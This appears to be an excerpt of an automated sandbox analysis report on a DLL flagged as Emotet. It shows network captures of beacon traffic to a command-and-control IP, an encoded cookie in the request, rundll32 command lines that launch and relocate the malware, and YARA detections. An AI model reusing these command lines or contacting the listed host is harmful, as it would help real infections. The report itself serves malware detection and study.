                                                                                                        TCP Packets

                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Dec 1, 2021 17:19:08.011106968 CET49806443192.168.2.346.55.222.11
                                                                                                        Dec 1, 2021 17:19:08.011153936 CET4434980646.55.222.11192.168.2.3
                                                                                                        Dec 1, 2021 17:19:08.011275053 CET49806443192.168.2.346.55.222.11
                                                                                                        Dec 1, 2021 17:19:08.044857979 CET49806443192.168.2.346.55.222.11
                                                                                                        Dec 1, 2021 17:19:08.044895887 CET4434980646.55.222.11192.168.2.3
                                                                                                        Dec 1, 2021 17:19:08.215882063 CET4434980646.55.222.11192.168.2.3
                                                                                                        Dec 1, 2021 17:19:08.215986013 CET49806443192.168.2.346.55.222.11
                                                                                                        Dec 1, 2021 17:19:08.643136978 CET49806443192.168.2.346.55.222.11
                                                                                                        Dec 1, 2021 17:19:08.643177032 CET4434980646.55.222.11192.168.2.3
                                                                                                        Dec 1, 2021 17:19:08.643601894 CET4434980646.55.222.11192.168.2.3
                                                                                                        Dec 1, 2021 17:19:08.643733025 CET49806443192.168.2.346.55.222.11
                                                                                                        Dec 1, 2021 17:19:08.648392916 CET49806443192.168.2.346.55.222.11
                                                                                                        Dec 1, 2021 17:19:08.692873955 CET4434980646.55.222.11192.168.2.3
                                                                                                        Dec 1, 2021 17:19:09.097501040 CET4434980646.55.222.11192.168.2.3
                                                                                                        Dec 1, 2021 17:19:09.097637892 CET4434980646.55.222.11192.168.2.3
                                                                                                        Dec 1, 2021 17:19:09.097688913 CET49806443192.168.2.346.55.222.11
                                                                                                        Dec 1, 2021 17:19:09.097750902 CET49806443192.168.2.346.55.222.11
                                                                                                        Dec 1, 2021 17:19:09.104707003 CET49806443192.168.2.346.55.222.11
                                                                                                        Dec 1, 2021 17:19:09.104743958 CET4434980646.55.222.11192.168.2.3

                                                                                                        HTTP Request Dependency Graph

                                                                                                        • 46.55.222.11

                                                                                                        HTTPS Proxied Packets

                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        0192.168.2.34980646.55.222.11443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-12-01 16:19:08 UTC0OUTGET /UKKmNexCiEZNdWysJnUxJeBGVUutat HTTP/1.1
                                                                                                        Cookie: ryViNxlKLE=9E+7EQIWXaUCIB8lnocBFFwUUiBI8SGBfem5avtBjtVXnImPnR3whzMx0REyqL1Uc4BT3kSyDvkg+xE+CEuKtlih6TF+LkZeje1NbjVTi54TDmgo60tk/Kg/NR9aYRHyTOl+2ET6B9p/LkYlQ5eWXFQF+pel2YIcjQhyqb10bAUn21aDx78snz7WrQWN4T5bpw+7YlmPsZM9sv8/HvOYXAWEyssXnp5p0QBoT6AdMnxwJrqCeVO7AnBv3qafuoZpQrj4x4SA+CHiBieL+jDSad8SNnwqvg==
                                                                                                        Host: 46.55.222.11
                                                                                                        Connection: Keep-Alive
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-12-01 16:19:09 UTC0INHTTP/1.1 200 OK
                                                                                                        Server: nginx
                                                                                                        Date: Wed, 01 Dec 2021 16:19:09 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        2021-12-01 16:19:09 UTC0INData Raw: 32 31 64 0d 0a 1c 61 b5 bc 9a 55 57 ef 4a c7 df 56 c3 c4 3d cb 0f 77 d5 74 93 a7 3f 5b 15 25 ba 2c 32 fb 9b 59 5c b4 4a a8 ea 58 04 31 2d a8 c4 81 5c 29 4d 46 40 1b 11 8c 41 8c c5 dd c8 8b 9f d9 1e 52 62 44 3f 6d 4f d4 24 7f 54 b1 a6 b6 f7 f6 3a 9b 97 61 67 6f 2a 82 2f 64 b1 d9 32 10 ae 40 59 d7 3c d2 50 cf e3 0c 19 4a 71 59 b1 45 00 17 25 22 86 54 9d 06 bf 6c 8c b4 cd 57 5b 50 ed a2 e1 28 78 cc 9a d5 b3 f5 11 d6 c8 f0 0a 19 9e 6f b8 4a 21 b3 5f 67 9c 02 b2 cf 9c e0 b3 0c cd 89 a1 bc 16 71 c2 e1 70 fa 41 4e 38 04 ca fc e5 60 22 32 64 50 92 2b 31 9d 0a c3 72 90 37 b8 12 95 fc 6c 82 b8 75 99 2b 25 cc 2e d5 5a f9 38 d2 c7 bc ba dc eb c7 df 8a 5a 2a 7e ed ed 5e 5f 4d f1 2b 39 cc ca d1 ff d9 f0 9b 3b 23 7f eb 52 94 d3 22 ba e2 f0 6f 8a 78 da 83 33 46 c3 b5 b7
                                                                                                        Data Ascii: 21daUWJV=wt?[%,2Y\JX1-\)MF@ARbD?mO$T:ago*/d2@Y<PJqYE%"TlW[P(xoJ!_gqpAN8`"2dP+1r7lu+%.Z8Z*~^_M+9;#R"ox3F


                                                                                                        Code Manipulations

                                                                                                        Statistics

                                                                                                        Behavior

                                                                                                        Click to jump to process

                                                                                                        System Behavior

                                                                                                        General

                                                                                                        Start time:17:15:10
                                                                                                        Start date:01/12/2021
                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:c:\windows\system32\svchost.exe -k unistacksvcgroup
                                                                                                        Imagebase:0x7ff70d6e0000
                                                                                                        File size:51288 bytes
                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high

                                                                                                        General

                                                                                                        Start time:17:15:11
                                                                                                        Start date:01/12/2021
                                                                                                        Path:C:\Windows\System32\loaddll32.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:loaddll32.exe "C:\Users\user\Desktop\2gyA5uNl6VPQUA.dll"
                                                                                                        Imagebase:0x330000
                                                                                                        File size:893440 bytes
                                                                                                        MD5 hash:72FCD8FB0ADC38ED9050569AD673650E
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000001.00000000.578776757.0000000000A5D000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000001.00000002.596108665.0000000000A5D000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000001.00000002.595999827.0000000000930000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000001.00000000.578639964.0000000000930000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000001.00000000.586858412.0000000000A5D000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000001.00000000.586723752.0000000000930000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000001.00000000.584768753.0000000000930000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000001.00000000.585019489.0000000000A5D000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000001.00000000.567434432.0000000000A5D000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000001.00000000.564974375.0000000000930000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                        Reputation:high

                                                                                                        General

                                                                                                        Start time:17:15:11
                                                                                                        Start date:01/12/2021
                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\2gyA5uNl6VPQUA.dll",#1
                                                                                                        Imagebase:0xd80000
                                                                                                        File size:232960 bytes
                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high

                                                                                                        General

                                                                                                        Start time:17:15:11
                                                                                                        Start date:01/12/2021
                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:rundll32.exe C:\Users\user\Desktop\2gyA5uNl6VPQUA.dll,Control_RunDLL
                                                                                                        Imagebase:0x1340000
                                                                                                        File size:61952 bytes
                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000003.513859712.0000000003649000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.550893742.00000000012D0000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                        Reputation:high

                                                                                                        General

                                                                                                        Start time:17:15:11
                                                                                                        Start date:01/12/2021
                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:rundll32.exe "C:\Users\user\Desktop\2gyA5uNl6VPQUA.dll",#1
                                                                                                        Imagebase:0x1340000
                                                                                                        File size:61952 bytes
                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.549793958.0000000000F90000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.538768779.0000000000E9A000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                        Reputation:high

                                                                                                        General

                                                                                                        Start time:17:15:16
                                                                                                        Start date:01/12/2021
                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:rundll32.exe C:\Users\user\Desktop\2gyA5uNl6VPQUA.dll,axamexdrqyrgb
                                                                                                        Imagebase:0x1340000
                                                                                                        File size:61952 bytes
                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.557633995.00000000007E0000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.557657494.000000000083A000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                        Reputation:high

                                                                                                        General

                                                                                                        Start time:17:15:24
                                                                                                        Start date:01/12/2021
                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:rundll32.exe C:\Users\user\Desktop\2gyA5uNl6VPQUA.dll,bhramccfbdd
                                                                                                        Imagebase:0x1340000
                                                                                                        File size:61952 bytes
                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.578455384.00000000007FA000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.578325190.0000000000570000.00000040.00000010.sdmp, Author: Joe Security
                                                                                                        Reputation:high

                                                                                                        General

                                                                                                        Start time:17:16:56
                                                                                                        Start date:01/12/2021
                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\2gyA5uNl6VPQUA.dll",Control_RunDLL
                                                                                                        Imagebase:0x1340000
                                                                                                        File size:61952 bytes
                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high

                                                                                                        General

                                                                                                        Start time:17:16:59
                                                                                                        Start date:01/12/2021
                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qrcyfrqyrevqn\zfjlg.mpd",GeWefLGOgdb
                                                                                                        Imagebase:0x1340000
                                                                                                        File size:61952 bytes
                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.663770243.0000000000EC0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.663823655.0000000000F2A000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                        Reputation:high

                                                                                                        General

                                                                                                        Start time:17:17:14
                                                                                                        Start date:01/12/2021
                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\2gyA5uNl6VPQUA.dll",Control_RunDLL
                                                                                                        Imagebase:0x1340000
                                                                                                        File size:61952 bytes
                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        General

                                                                                                        Start time:17:17:18
                                                                                                        Start date:01/12/2021
                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                        Imagebase:0x7ff70d6e0000
                                                                                                        File size:51288 bytes
                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        General

                                                                                                        Start time:17:17:19
                                                                                                        Start date:01/12/2021
                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 6376 -ip 6376
                                                                                                        Imagebase:0x13b0000
                                                                                                        File size:434592 bytes
                                                                                                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        General

                                                                                                        Start time:17:17:20
                                                                                                        Start date:01/12/2021
                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\2gyA5uNl6VPQUA.dll",Control_RunDLL
                                                                                                        Imagebase:0x1340000
                                                                                                        File size:61952 bytes
                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        General

                                                                                                        Start time:17:17:28
                                                                                                        Start date:01/12/2021
                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6376 -s 304
                                                                                                        Imagebase:0x13b0000
                                                                                                        File size:434592 bytes
                                                                                                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        General

                                                                                                        Start time:17:17:29
                                                                                                        Start date:01/12/2021
                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                        Imagebase:0x7ff70d6e0000
                                                                                                        File size:51288 bytes
                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        General

                                                                                                        Start time:17:17:29
                                                                                                        Start date:01/12/2021
                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 164 -p 6376 -ip 6376
                                                                                                        Imagebase:0x13b0000
                                                                                                        File size:434592 bytes
                                                                                                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        General

                                                                                                        Start time:17:17:33
                                                                                                        Start date:01/12/2021
                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6376 -s 308
                                                                                                        Imagebase:0x13b0000
                                                                                                        File size:434592 bytes
                                                                                                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        General

                                                                                                        Start time:17:17:38
                                                                                                        Start date:01/12/2021
                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                        Imagebase:0x7ff70d6e0000
                                                                                                        File size:51288 bytes
                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        General

                                                                                                        Start time:17:17:56
                                                                                                        Start date:01/12/2021
                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                        Imagebase:0x7ff70d6e0000
                                                                                                        File size:51288 bytes
                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        General

                                                                                                        Start time:17:18:06
                                                                                                        Start date:01/12/2021
                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Qrcyfrqyrevqn\zfjlg.mpd",Control_RunDLL
                                                                                                        Imagebase:0x1340000
                                                                                                        File size:61952 bytes
                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000019.00000003.778115242.000000000112B000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000019.00000002.816294229.0000000001200000.00000040.00000010.sdmp, Author: Joe Security

                                                                                                        General

                                                                                                        Start time:17:18:16
                                                                                                        Start date:01/12/2021
                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                        Imagebase:0x7ff70d6e0000
                                                                                                        File size:51288 bytes
                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language

                                                                                                        Disassembly

                                                                                                        Code Analysis

                                                                                                        Reset < >